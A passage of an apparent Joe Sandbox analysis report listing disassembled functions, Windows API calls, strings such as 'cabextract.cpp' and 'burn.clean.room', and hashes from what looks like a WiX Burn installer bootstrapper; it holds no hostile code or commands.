                                                                                                                                                                    • Opcode ID: fc0f817c922b674548731e92c2f9bdca4e7eb014482d46bc27f0318c9ed36ead
                                                                                                                                                                    • Instruction ID: e1ee5559f955be15346bbac56c14a8afe0672a45fbb19fe50720f42009ba4bfa
                                                                                                                                                                    • Opcode Fuzzy Hash: fc0f817c922b674548731e92c2f9bdca4e7eb014482d46bc27f0318c9ed36ead
                                                                                                                                                                    • Instruction Fuzzy Hash: E111B636B40288BBDF21DBD5DC8AEAEB7B8EB10710F500075E600AB191D7719F81E710
                                                                                                                                                                    Function 00CC0764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenA.KERNEL32(00CA12CF,00000000,00000000,?,?,?,00CC0013,00CA12CF,00CA12CF,?,00000000,0000FDE9,?,00CA12CF,8007139F,Invalid operation for this state.), ref: 00CC0776
                                                                                                                                                                    • WriteFile.KERNELBASE(00000208,00000000,00000000,?,00000000,?,?,00CC0013,00CA12CF,00CA12CF,?,00000000,0000FDE9,?,00CA12CF,8007139F), ref: 00CC07B2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00CC0013,00CA12CF,00CA12CF,?,00000000,0000FDE9,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CC07BC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 606256338-3545173039
                                                                                                                                                                    • Opcode ID: 667dac4cb4f58c59fbb423ba8312afad8bf05278c66e55b408e6d1b87804f5c6
                                                                                                                                                                    • Instruction ID: 59690332044b4476d31da97e23a94b03ebe13c7548af95ba8341247495abff81
                                                                                                                                                                    • Opcode Fuzzy Hash: 667dac4cb4f58c59fbb423ba8312afad8bf05278c66e55b408e6d1b87804f5c6
                                                                                                                                                                    • Instruction Fuzzy Hash: 6411CA72941224EB8314DAA6CD85FAFBB6CEB44761F210228FD10D7140D730BE40CBE0
                                                                                                                                                                    Function 00CA09EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00CA140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00CA0A19,?,?,?), ref: 00CA1434
                                                                                                                                                                      • Part of subcall function 00CA140C: GetLastError.KERNEL32(?,00CA0A19,?,?,?), ref: 00CA143E
                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00CA0A27
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00CA0A31
                                                                                                                                                                    Strings
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0A55
                                                                                                                                                                    • Failed to read during cabinet extraction., xrefs: 00CA0A5F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                    • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2170121939-2426083571
                                                                                                                                                                    • Opcode ID: 14f2357ef480e1928407970252d8d710fbc8caaae04e549876250d36b351f58e
                                                                                                                                                                    • Instruction ID: c4f1d5676dd1233f163633c9b5a77ff95ed52e06cb66b81e743d9020c8482eec
                                                                                                                                                                    • Opcode Fuzzy Hash: 14f2357ef480e1928407970252d8d710fbc8caaae04e549876250d36b351f58e
                                                                                                                                                                    • Instruction Fuzzy Hash: 9111E536900266FBCB219F95DC04E9E7B68FF097A4F114115FD14A7250C7309D10E7D4
                                                                                                                                                                    Function 00CA140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00CA0A19,?,?,?), ref: 00CA1434
                                                                                                                                                                    • GetLastError.KERNEL32(?,00CA0A19,?,?,?), ref: 00CA143E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to move to virtual file pointer., xrefs: 00CA146C
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA1462
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2976181284-3005670968
                                                                                                                                                                    • Opcode ID: 91aa8b65d6c27375b7f8cb122c1d93d9d846a0e4c0a62f241fb8b048ee83b0ef
                                                                                                                                                                    • Instruction ID: 66ceb006bcceab0b3cc7cfe0a3390f680446bfe471c9554be769431f54ccf9c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 91aa8b65d6c27375b7f8cb122c1d93d9d846a0e4c0a62f241fb8b048ee83b0ef
                                                                                                                                                                    • Instruction Fuzzy Hash: E201F233900636B7CB215A9ACC09F8BFF28EF05BB4F19812AFE285A251D7319C10D6D4
                                                                                                                                                                    Function 00CA07B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(00CCB478,00000000,?,00CA1717,?,00000000,?,00C8C287,?,00C85405,?,00C975A5,?,?,00C85405,?), ref: 00CA07BF
                                                                                                                                                                    • GetLastError.KERNEL32(?,00CA1717,?,00000000,?,00C8C287,?,00C85405,?,00C975A5,?,?,00C85405,?,00C85445,00000001), ref: 00CA07C9
                                                                                                                                                                    Strings
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA07ED
                                                                                                                                                                    • Failed to set begin operation event., xrefs: 00CA07F7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorEventLast
                                                                                                                                                                    • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                                    • API String ID: 3848097054-4159625223
                                                                                                                                                                    • Opcode ID: c29da21d386144a24a54a8b812c981aaf9bf14b8699b7a8b6259b4cb3aa9f1e6
                                                                                                                                                                    • Instruction ID: 532a7723be74124ad15dcb6ba4a2886536c5bad40a9e55fd5e2995485a50cb5b
                                                                                                                                                                    • Opcode Fuzzy Hash: c29da21d386144a24a54a8b812c981aaf9bf14b8699b7a8b6259b4cb3aa9f1e6
                                                                                                                                                                    • Instruction Fuzzy Hash: 77F0EC3754263267832426D59D06F8F76989F06BF4F210136FE05F7280E624AD00D6D9
                                                                                                                                                                    Function 00C85123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00C81104,?,?,00000000), ref: 00C85142
                                                                                                                                                                    • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00C81104,?,?,00000000), ref: 00C85172
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareStringlstrlen
                                                                                                                                                                    • String ID: burn.clean.room
                                                                                                                                                                    • API String ID: 1433953587-3055529264
                                                                                                                                                                    • Opcode ID: 2f2653f21e5e863d8bb5442e717bbe9b8d36da8d4fa241e0d25efa7f638492da
                                                                                                                                                                    • Instruction ID: a12b66da11f0be14f1d1e54d7f24f5d4393b9cff6b0e7954374fe89ad8b6f02a
                                                                                                                                                                    • Opcode Fuzzy Hash: 2f2653f21e5e863d8bb5442e717bbe9b8d36da8d4fa241e0d25efa7f638492da
                                                                                                                                                                    • Instruction Fuzzy Hash: C801A2725006606FC7305B89ADC8F7FBBACEB14764B104126F816C7610D3B0AC41DBA5
                                                                                                                                                                    Function 00C83838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83877
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C83881
                                                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00C838EA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1230559179-0
                                                                                                                                                                    • Opcode ID: d3fcabeaeac26456bff53b2020fc584621c0cc1fda217ab55b87bd9c46ec428e
                                                                                                                                                                    • Instruction ID: 5a4febf0655051fcda868caa70bbffb07b24c0dc661264e38e43bfc20e924083
                                                                                                                                                                    • Opcode Fuzzy Hash: d3fcabeaeac26456bff53b2020fc584621c0cc1fda217ab55b87bd9c46ec428e
                                                                                                                                                                    • Instruction Fuzzy Hash: B321F8B2D0133D67DB20ABA5CC49F9EB768AB00B14F1105A5FD14EB281E674DE408BE4
                                                                                                                                                                    Function 00C83A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00C83BB6,00000000,?,00C81474,00000000,80004005,00000000,80004005,00000000,000001C7,?,00C813B8), ref: 00C83A20
                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?,00C83BB6,00000000,?,00C81474,00000000,80004005,00000000,80004005,00000000,000001C7,?,00C813B8,000001C7,00000100), ref: 00C83A27
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C83BB6,00000000,?,00C81474,00000000,80004005,00000000,80004005,00000000,000001C7,?,00C813B8,000001C7,00000100,?), ref: 00C83A31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 406640338-0
                                                                                                                                                                    • Opcode ID: 0f2f7c70e769b88b3a768cf6a69c3b4ecc32c18480bd453712d3dcc9a4901e1a
                                                                                                                                                                    • Instruction ID: 07a5b54f31805c39be8941b0191e4dca13344a4d8ca27ec1c2736779ce4c742b
                                                                                                                                                                    • Opcode Fuzzy Hash: 0f2f7c70e769b88b3a768cf6a69c3b4ecc32c18480bd453712d3dcc9a4901e1a
                                                                                                                                                                    • Instruction Fuzzy Hash: 30D01273A0413957872127E69D5DF9F7F5CEF04AA2B050121FD54D7220D725CD0097E8
                                                                                                                                                                    Function 00C8F755 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00CC0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00CEAAA0,00000000,?,00CC57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC0F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00C97D59,?,?,?), ref: 00C8F7B9
                                                                                                                                                                      • Part of subcall function 00CC1026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00C8F78E,00000000,Installed,00000000,?), ref: 00CC104B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: Installed
                                                                                                                                                                    • API String ID: 3677997916-3662710971
                                                                                                                                                                    • Opcode ID: 2b2693e890370e2e377edc24a06be4230e323e128c584e15df2ecaa95489e82c
                                                                                                                                                                    • Instruction ID: 16d1941571fc0bb4487dfe9afba80ccaca44166db333954cfd5971b1440a5a6c
                                                                                                                                                                    • Opcode Fuzzy Hash: 2b2693e890370e2e377edc24a06be4230e323e128c584e15df2ecaa95489e82c
                                                                                                                                                                    • Instruction Fuzzy Hash: FF014F36920118FBDB11EB94C846FDEBBB8EF04715F1141A9E900A7111D7759E909794
                                                                                                                                                                    Function 00CC0F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00CEAAA0,00000000,?,00CC57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC0F80
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 71445658-955085611
                                                                                                                                                                    • Opcode ID: 7c16486e3f8c93c4981705c0a31e29181319835c694e58fb6c9e3e58df6fab87
                                                                                                                                                                    • Instruction ID: 7a29316bd6f87c67ee272e8eea56c65065447f3972b4cd6044a63ada63d81f9c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c16486e3f8c93c4981705c0a31e29181319835c694e58fb6c9e3e58df6fab87
                                                                                                                                                                    • Instruction Fuzzy Hash: 20F0F633601176E69F3015D6CC05F6BAA49DB947B0F35412DFD569E250E6618C8096F0
                                                                                                                                                                    Function 00CBF49A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CBF491
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: b977e3792e466da2b541395033d6b92c0c175a937b2915e1ff782768987ce1ae
                                                                                                                                                                    • Instruction ID: 6f80033119a443aea2b06aee8e49ec957b83b1553e6deac569e2140fdcbd3b3f
                                                                                                                                                                    • Opcode Fuzzy Hash: b977e3792e466da2b541395033d6b92c0c175a937b2915e1ff782768987ce1ae
                                                                                                                                                                    • Instruction Fuzzy Hash: 41B012E12694826D374851175E07D37110CC1C5F22730417EF108C1141E8501C061032
                                                                                                                                                                    Function 00CBF4AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CBF491
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: 4bf7defb46aa8acad47ab9bde3c5d05a9e479185b456e15b15248ef1e3d7618a
                                                                                                                                                                    • Instruction ID: c8c8fe1bce615e275e649f7deb76723596a3bd7bd6ee7bbc0acd94990531a6f1
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bf7defb46aa8acad47ab9bde3c5d05a9e479185b456e15b15248ef1e3d7618a
                                                                                                                                                                    • Instruction Fuzzy Hash: 55B012E12695826C374851175D06D37110CC1C5F22730827EF108C1141E8601C451032
                                                                                                                                                                    Function 00CBF479 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CBF491
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: 536793f70b4070aea36a7c871a523429f8ee9834e60e73a5ec55fd4f64e838ba
                                                                                                                                                                    • Instruction ID: 7598d4d0f42f9eba91ac0f58513b3b7744b3c4f8dc1846f5169b5239b6a9a7ef
                                                                                                                                                                    • Opcode Fuzzy Hash: 536793f70b4070aea36a7c871a523429f8ee9834e60e73a5ec55fd4f64e838ba
                                                                                                                                                                    • Instruction Fuzzy Hash: 19B012E52694827C370811135D06C37110CC1C1F22730C27EF504C0041A8501C051032
                                                                                                                                                                    Function 00C83AF0 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,000001C7,?,?,00C8226D,?,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000), ref: 00C83B04
                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,00C8226D,?,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83B0B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                                    • Opcode ID: d00f4207fe21ab8e3f0141b89c93160a0a77d8d32f459c2b9aed9eb2a784cc99
                                                                                                                                                                    • Instruction ID: ec2a83257b9d2861f74ffeb8998745c33b8a45aadf9dd1947542dc5f30c1f946
                                                                                                                                                                    • Opcode Fuzzy Hash: d00f4207fe21ab8e3f0141b89c93160a0a77d8d32f459c2b9aed9eb2a784cc99
                                                                                                                                                                    • Instruction Fuzzy Hash: 88D0C97215420DAB8F005FE8DC0EEAE3BACEB58602B088405F915C2120C739E8249A60
                                                                                                                                                                    Function 00C8394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,000001C7,?,00C82274,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83960
